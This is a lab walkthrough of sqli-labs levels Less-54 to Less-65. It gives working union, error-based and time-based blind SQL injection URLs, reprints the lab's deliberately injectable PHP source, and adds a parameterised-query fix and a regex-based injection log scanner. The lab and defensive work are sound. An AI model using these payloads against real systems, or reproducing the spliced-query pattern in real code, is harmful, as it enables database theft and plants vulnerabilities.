54. Less-54: Challenge-1
54.1 Injection walkthrough: ten attempts, then a reset
The source sets a variable `times` to 10, which caps the number of injected statements; once that number is exceeded, the table name, password and the rest of the challenge data in the database are reset and regenerated.
- 1. Get the table name in the database:
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
From the output above, the table name is plmmlsw7pm.
- 2. Get the columns of that table:
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges'and table_name='plmmlsw7pm'--+
As shown, the table's columns are: id, sessid, secret_X2ZO, tryy
- 3. Read the data stored in those columns:
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,group_concat(id),group_concat(sessid) from plmmlsw7pm--+
http://192.168.10.208:8081/sqli-labs-master/Less-54/index.php?id=-1' union select 1,group_concat(secret_X2ZO),group_concat(tryy) from plmmlsw7pm--+
Here we learn that secret_X2ZO holds the password we are after, namely LMowZDNDDp2WV4lP9G0zNGkr, so we submit it in the form below.
The success screenshot flashes past in an instant, so I won't paste it; try it yourself and enjoy the moment of success!
As shown, once you succeed the database is regenerated as well. Yes, it is that blunt.
54.2 Code walkthrough
Since file uploads are not allowed here, I have copied essentially the whole source below. It is worth studying carefully; it really is quite clever!
- For example, how does it regenerate the database names on each reset?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-54:Challenge-1</title>
</head>
<body bgcolor="#000000">
<div style ="text-align:right">
<form action="" method="post">
<input type="submit" name="reset" value="Reset the Challenge!" />
</form>
</div>
</right>
<div style=" margin-top:20px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include '../sql-connections/sql-connect-1.php';
include '../sql-connections/functions.php';
error_reporting(0);
$pag = $_SERVER['PHP_SELF']; /*generating page address to piggy back after redirects...
PHP_SELF is generally used to reference the current page's address; it is a global variable populated automatically by the server.*/
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; /*characterset for generating random data*/
$times= 10;
$table = table_name();
$col = column_name(1);/*session id column name*/
$col1 = column_name(2); /*secret key column name*/
// Submitting the final answer
if(!isset($_POST['answer_key']))// no answer key has been submitted via the button yet
{
// resetting the challenge and repopulating the table .
if(isset($_POST['reset']))
{
setcookie('challenge', ' ', time() - 3600000);
echo "<font size=4>You have reset the Challenge</font><br>\n";
echo "Redirecting you to main challenge page..........\n";
header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
//echo "cookie expired";
}
else
{
// Checking the cookie on the page and populate the table with random value.
if(isset($_COOKIE['challenge']))
{
$sessid=$_COOKIE['challenge'];
//echo "Cookie value: ".$sessid;
}
else
{
$expire = time()+60*60*24*30;
$hash = data($table,$col);
setcookie("challenge", $hash, $expire);
}
echo "<br>\n";
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
//update the counter in database
next_tryy();
//Display attempts on screen.
$tryyy = view_attempts();
echo "You have made : ". $tryyy ." of $times attempts";
echo "<br><br><br>\n";
//Reset the Database if you exceed allowed attempts.
// i.e. once more than the allowed 10 attempts have been made, reset the database.
if($tryyy >= ($times+1))
{
setcookie('challenge', ' ', time() - 3600000);
echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
echo "Redirecting you to challenge page..........\n";
header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
echo "<br>\n";
}
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value as done in Lab excercises\n<br><br>\n</font>";
echo "<font color='#00FFFF': size=3>The objective of this challenge is to dump the <b>(secret key)</b> from only random table from Database <b><i>('CHALLENGES')</i></b> in Less than $times attempts<br>";
echo "For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.<br>" ;
}
}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-54.jpg" />
</center>
<br><br><br>
<div style=" color:#00FFFF; font-size:18px; text-align:center">
<form name="input" action="" method="post">
Submit Secret Key: <input type="text" name="key">
<input type="submit" name = "answer_key" value="Submit">
</form>
</div>
<?php
}
else
{
echo '<div style=" color:#00FFFF; font-size:18px; text-align:center">';
$key = addslashes($_POST['key']);
$key = mysql_real_escape_string($key);
//echo $key;
//Query table to verify your result
$sql="SELECT 1 FROM $table WHERE $col1= '$key'";
//echo "$sql";
$result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#FFFF00">';
echo "\n<br><br><br>";
echo '<img src="../images/Less-54-1.jpg" />';
echo "</font>";
header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
}
else
{
echo '<font color= "#FFFF00">';
echo "\n<br><br><br>";
echo '<img src="../images/slap1.jpg" />';
header( "refresh:3;url=index.php" );
//print_r(mysql_error());
echo "</font>";
}
}
?>
</body>
</html>
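The query at the heart of this level is `$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";`, where `$id` comes straight from `$_GET['id']`. The following is an added example, not sqli-labs code and not part of this write-up: it rebuilds that lookup in Python against an in-memory SQLite table (a constructed stand-in for `security.users`, with a made-up row), once by string splicing exactly as the lab's PHP does it and once with a bound parameter, so you can see why the `-1' union select ... --+` input from section 54.1 changes the query's meaning in the first case and is just an ordinary string in the second.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the lab's security.users table; the row is made up.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_id: str):
    # Same construction as the lab's PHP:
    #   $sql = "SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    # The input is spliced into the SQL text, so a quote inside it closes the
    # literal and everything after it is parsed as SQL.
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    # Bound parameter: the driver passes the input as one value, never as SQL
    # syntax, so quotes, UNION and comment markers carry no special meaning.
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "-1' union select 1,2,3-- "  # the write-up's -1' union select ... --+ shape
    print("unsafe, id=1         :", lookup_unsafe(db, "1"))
    print("unsafe, union payload:", lookup_unsafe(db, payload))
    print("safe,   id=1         :", lookup_safe(db, "1"))
    print("safe,   union payload:", lookup_safe(db, payload))
```

With the spliced version the union payload returns the attacker-chosen row (1, 2, 3) instead of a user; with the bound parameter the same input simply matches nothing. The lab's `mysql_*` functions have no parameter binding at all, which is why fixing this in the PHP means moving to mysqli or PDO prepared statements rather than escaping `$id`.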
55. Less-55: Challenge-2
This level is the same as Less-54, except that the closing changes to a single quote.
http://192.168.10.208:8081/sqli-labs-master/Less-55/index.php?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
56. Less-56: Challenge-3
This level is the same as Less-54, except that the closing changes to a single quote plus a parenthesis.
http://192.168.10.208:8081/sqli-labs-master/Less-56/index.php?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
57. Less-57: Challenge-4
This level is the same as Less-54, except that the closing changes to a double quote.
http://192.168.10.208:8081/sqli-labs-master/Less-57/index.php?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
58. Less-58: Challenge-5
Above is a side-by-side comparison of the Less-58 and Less-54 source. After the SQL statement runs, Less-58 does not echo the query result back to the page, so union-based injection cannot be used here; error-based injection is used instead.
The `times` variable also shows that the allowance has dropped to 5 attempts, so spend them carefully!
http://192.168.10.208:8081/sqli-labs-master/Less-58/index.php?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
59. Less-59: Challenge-6
Like Less-58, except the closing is numeric (no quotes).
http://192.168.10.208:8081/sqli-labs-master/Less-59/index.php?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
60. Less-60: Challenge-7
Like Less-58, except the closing is a double quote plus a parenthesis.
http://192.168.10.208:8081/sqli-labs-master/Less-60/index.php?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
61. Less-61: Challenge-8
Like Less-58, except the closing is a single quote plus two parentheses.
http://192.168.10.208:8081/sqli-labs-master/Less-61/index.php?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
62. Less-62: Challenge-9
As shown above, the attempt limit `times` is raised to 130.
As the screenshot shows, this level resembles Less-58 but closes with a single quote plus a parenthesis; database error messages are no longer printed, so error-based injection is impossible, and since no query data is displayed either, union injection is impossible too.
So what remains is time-based blind injection.
http://192.168.10.208:8081/sqli-labs-master/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
http://192.168.10.208:8081/sqli-labs-master/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=80,0,sleep(5))--+
63. Less-63: Challenge-10
As the screenshot shows, this level resembles Less-62 but closes with a single quote; database error messages are not printed, so error-based injection is impossible, and since no query data is displayed, union injection is impossible too. So again only time-based injection is left.
http://192.168.10.208:8081/sqli-labs-master/Less-63/?id=1%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
64. Less-64: Challenge-11
As the screenshot shows, this level resembles Less-63 but closes with parentheses; database error messages are not printed, so error-based injection is impossible, and since no query data is displayed, union injection is impossible too. So again only time-based injection is left.
http://192.168.10.208:8081/sqli-labs-master/Less-64/?id=1))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
65. Less-65: Challenge-12
As the screenshot shows, this level resembles Less-63 but closes with a double quote plus a parenthesis; database error messages are not printed, so error-based injection is impossible, and since no query data is displayed, union injection is impossible too. So again only time-based injection is left.
http://192.168.10.208:8081/sqli-labs-master/Less-65/?id=1")and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+
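One thing the Less-54 source in section 54.2 does that is easy to overlook is `fwrite($fp,'ID:'.$id."\n")`: every `id` parameter is appended to result.txt. That file is exactly what a defender would read to spot the three techniques used across Less-54 to Less-65 (union, `extractvalue` error-based, `sleep` time-based). The following is an added example, not part of sqli-labs or of this write-up: a small Python scanner that parses lines in that `ID:<value>` format and tags each with the technique its signature matches. The log lines in `SAMPLE_LOG` are constructed to mirror the payload shapes shown above (one of them kept in its raw percent-encoded form, as a request URL would carry it); they are not captured traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# One signature per technique used in the walkthrough, plus the trailing
# comment marker every payload ends with to discard the rest of the query.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "error": re.compile(r"\bextractvalue\s*\(", re.I),
    "time": re.compile(r"\bsleep\s*\(", re.I),
    "schema": re.compile(r"\binformation_schema\.", re.I),
    "comment": re.compile(r"--(\s|$)|#"),
}

# Constructed log lines in the format the lab writes: fwrite($fp,'ID:'.$id."\n").
# They reproduce the payload shapes from this write-up; nothing here is real traffic.
SAMPLE_LOG = [
    "ID:1\n",
    "ID:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- \n",
    "ID:-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))-- \n",
    "ID:1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))--+\n",
    "ID:42\n",
]


def parse_line(line: str):
    """Return the id value from an 'ID:<value>' line, or None for other lines.

    PHP already URL-decodes $_GET['id'] before the lab logs it; decoding once
    more normalises payloads that arrived double-encoded and turns the '+' of
    the '--+' terminator back into the space MySQL requires after '--'."""
    if not line.startswith("ID:"):
        return None
    return unquote_plus(line[3:].rstrip("\n"))


def classify(value: str):
    """Sorted technique tags whose signature matches the id value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))


def scan(lines):
    """(decoded value, tags) for every log line that trips at least one signature."""
    hits = []
    for line in lines:
        value = parse_line(line)
        if value is not None:
            tags = classify(value)
            if tags:
                hits.append((value, tags))
    return hits


def summary(hits):
    """How many flagged lines carry each tag."""
    return dict(Counter(tag for _, tags in hits for tag in tags))


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for value, tags in found:
        print(tags, value[:60])
    print(summary(found))
```

Run against the constructed log it flags three of the five lines: the union request, the `extractvalue` request and the percent-encoded `sleep(5)` request, with `information_schema` and the `--` terminator tagged on all three. Signature matching like this is a first pass only; in a real deployment you would also correlate attempt counts per session, much as the lab's own `tryy` column does, since the time-based levels need dozens of near-identical requests per character.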